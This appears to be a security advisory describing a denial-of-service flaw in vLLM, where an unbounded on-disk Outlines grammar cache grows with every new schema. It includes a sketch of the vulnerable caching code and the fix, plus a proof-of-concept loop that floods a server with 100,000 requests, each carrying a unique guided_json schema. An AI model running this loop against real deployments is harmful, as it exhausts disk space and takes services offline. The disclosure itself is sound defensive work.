Safety vulnerability ID: 76302
The information on this page was manually curated by our Cybersecurity Intelligence Team.
Affected versions of the vLLM package are vulnerable to Denial of Service through unbounded filesystem cache growth in the Outlines guided decoding backend. The outlines_logits_processors.py module places no limit on the size of the grammar compilation cache, so every previously unseen schema adds a new entry that persists on disk.
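A minimal sketch of the vulnerable pattern follows; it is illustrative only and does not reproduce vLLM's actual code. The cache directory, hashing scheme, and compile_grammar stand-in are all hypothetical, but the essential flaw is the same: a disk-backed cache keyed on the full schema with no size limit or eviction policy.

```python
# Illustrative sketch of the vulnerable pattern (not vLLM's actual code):
# a disk-backed memoization cache keyed by the schema text, with no size
# limit or eviction, so every unique schema adds a permanent entry.
import hashlib
import json
import pathlib

CACHE_DIR = pathlib.Path("/tmp/grammar_cache")  # hypothetical location
CACHE_DIR.mkdir(parents=True, exist_ok=True)

def compile_grammar(schema: str) -> bytes:
    """Stand-in for the expensive schema -> grammar compilation step."""
    return json.dumps({"compiled_from": schema}).encode()

def get_compiled_grammar(schema: str) -> bytes:
    # Key the cache entry on a hash of the schema text.
    key = hashlib.sha256(schema.encode()).hexdigest()
    path = CACHE_DIR / key
    if path.exists():
        return path.read_bytes()
    compiled = compile_grammar(schema)
    # No eviction policy: each previously unseen schema writes a new
    # file, so attacker-controlled unique schemas grow the cache forever.
    path.write_bytes(compiled)
    return compiled
```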
A remote attacker can exploit this vulnerability by sending numerous requests with unique schemas through the OpenAI-compatible API server, causing each request to add a new entry to the cache, resulting in filesystem exhaustion and service unavailability. Additionally, the cache was enabled by default without administrative controls, making all V0 engine deployments vulnerable.
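The attack pattern can be sketched as follows, assuming a vulnerable V0 deployment exposing the OpenAI-compatible API on localhost:8000; the model name is hypothetical, and guided_json is the request field vLLM accepts for schema-guided decoding. Each iteration carries a schema the server has never seen, so each one forces a fresh grammar compilation and a new persistent cache entry.

```python
# Sketch of the attack pattern against a local test deployment, assuming a
# vLLM OpenAI-compatible server on localhost:8000.
import requests

URL = "http://localhost:8000/v1/completions"

for i in range(100_000):
    # Vary a property name so every request carries a never-before-seen
    # schema, forcing a fresh compilation and a new on-disk cache entry.
    schema = {
        "type": "object",
        "properties": {f"field_{i}": {"type": "string"}},
    }
    requests.post(URL, json={
        "model": "my-model",    # hypothetical model name
        "prompt": "hello",
        "max_tokens": 1,
        "guided_json": schema,  # vLLM's guided decoding parameter
    })
```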
The vulnerability was fixed by disabling the Outlines cache by default and introducing the VLLM_V0_USE_OUTLINES_CACHE environment variable for administrators who wish to explicitly enable it. The V1 engine is not affected by this vulnerability.
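On a patched deployment, administrators who accept the trade-off can opt back in by setting the variable in the server's environment before startup. A sketch, assuming the vllm CLI is installed and using a hypothetical model name:

```python
# Sketch: explicitly re-enabling the Outlines cache on a patched V0 deployment.
# VLLM_V0_USE_OUTLINES_CACHE is the opt-in variable introduced by the fix;
# it must be present in the server process's environment at startup.
import os
import subprocess

env = dict(os.environ, VLLM_V0_USE_OUTLINES_CACHE="1")
subprocess.run(
    ["vllm", "serve", "my-model"],  # hypothetical model name
    env=env,
    check=True,
)
```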
Latest version: 0.11.0
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs.